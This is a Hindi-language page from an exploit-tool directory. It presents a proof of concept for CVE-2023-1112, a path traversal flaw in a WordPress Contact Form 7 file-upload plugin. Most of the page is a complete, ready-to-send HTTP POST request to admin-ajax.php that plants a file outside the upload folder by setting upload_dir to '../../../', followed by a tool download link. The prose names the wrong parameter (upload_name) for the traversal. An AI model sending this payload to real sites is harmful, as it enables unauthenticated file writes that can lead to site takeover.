Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal — ड्रैग और ड्रॉप मल्टीपल फ़ाइल अपलोडर PRO - Contact Form 7 v5.0.6.1 पथ ट्रैवर्सल (CVE-2023-1112) | Kitploit
उपकरण/GitHubGitHub/nickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubnickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal

Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal

ड्रैग और ड्रॉप मल्टीपल फ़ाइल अपलोडर PRO - Contact Form 7 v5.0.6.1 पथ ट्रैवर्सल (CVE-2023-1112)

रिपॉजिटरी देखें
231113 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 पथ भ्रमण

जानकारी

Drag and Drop Multiple File Uploader PRO - Contact Form 7 संस्करण 5.0.6.1 में पथ भ्रमण (Path Traversal) एक अप्रमाणित दूरस्थ हमलावर को रिमोट सर्वर पर किसी भी लिखने योग्य स्थान पर फ़ाइलें अपलोड करने की अनुमति देता है (CVE-2023-1112)।

इस कमज़ोरी का शोषण करने के लिए, हमलावर को प्लगइन के फ़ॉर्म का उपयोग करके एक फ़ाइल अपलोड करनी होगी। इस POST अनुरोध में पैरामीटर upload_name होना चाहिए, जिसका मान उस फ़ोल्डर का नाम है जिसमें फ़ाइल अपलोड की जाएगी। हमलावर जो चाहे वह डाल सकता है, जैसे कि ../, ../../../, foldername (यह अपलोड निर्देशिका पर "foldername" फ़ोल्डर बनाएगा), आदि।

उदाहरण

POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

स्क्रीनशॉट

सामान्य अनुरोध

image

दुर्भावनापूर्ण अनुरोध

image

दुर्भावनापूर्ण अनुरोध ने फ़ाइल को वेबसर्वर रूट पर सफलतापूर्वक अपलोड कर दिया

image

टूल डाउनलोड करें